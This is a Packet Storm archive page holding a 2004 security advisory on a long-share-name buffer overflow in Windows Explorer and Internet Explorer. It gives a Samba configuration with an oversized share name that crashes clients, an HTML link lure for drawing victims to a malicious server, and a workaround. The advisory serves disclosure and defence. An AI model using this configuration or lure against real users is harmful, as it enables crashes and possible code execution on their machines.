exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

explorer-vuln.txt

explorer-vuln.txt
Posted Apr 25, 2004
Authored by Rodrigo Gutierrez

Windows fails to handle long share names when accessing a remote file servers such as samba, allowing a malicious server to crash the clients explorer and the ability to execute arbitrary code in the machine as the current user (usually with Administrator rights on Windows machines). Verified to still work on IE 5.0.3700.1000 on Win2k SP4. The author originally notified Microsoft in early 2002.

tags | advisory, remote, arbitrary
systems | windows
SHA-256 | 732e3e74f77ebd64d1be72f860691364496a6715edd0d0138eaa48142e8c84ea

explorer-vuln.txt

Change Mirror Download
Microsoft Explorer and Internet Explorer Long Share Name Buffer Overflow.



Author: Rodrigo Gutierrez <rodrigo@intellicomp.cl>

Affected: MS Internet Explorer, MS Explorer (explorer.exe)
Windows XP(All), Windows 2000(All)

Not Tested: Windows 2003, Windows me, Windows 98, Windows 95

Vendor Status: i notified the vendor in the beginning of 2002, this
vulnerability was supposed to be fixed in xp service
pack 1 according to the vendors knowledge base article
322857.

Vendor url: http://support.microsoft.com/default.aspx?scid=kb;en-us;322857



Background.

MS Explorer (explorer.exe) and MS Internet Explorer(IEXPLORE.EXE) are
core pieces of Microsoft Windows Operating Systems.



Description

Windows fails to handle long share names when accessing a remote
file servers such as samba, allowing a malicious server to crash the
clients explorer and eventually get to execute arbitrary code in the
machine as the current user (usually with Administrator rights in windows
machines).



Analysis

In order to exploit this, an attacker must be able to get a user to connect
to a malicious server which contains a share name equal or longer than 300
characters, windows wont allow you to create such a share, but of course samba
includes the feature ;). After your samba box is up and running create a
share in you smb.conf :



#------------ CUT HERE -------------

[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
comment = Area 51
path = /tmp/testfolder
public = yes
writable = yes
printable = no
browseable = yes
write list = @trymywingchung

#------------ CUT HERE -------------


After your server is up, just get to your windows test box and get to the
start menu > run > \\your.malicious.server.ip., plufff, explorer will crash
:).

Social Engineering:

<a href="\\my.malicious.server.ip">Enter My 0day sploit archive</a>



Workaround.

>From your network card settings disable the client for Microsoft networks
until a real fix for this vulnerability is available.
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close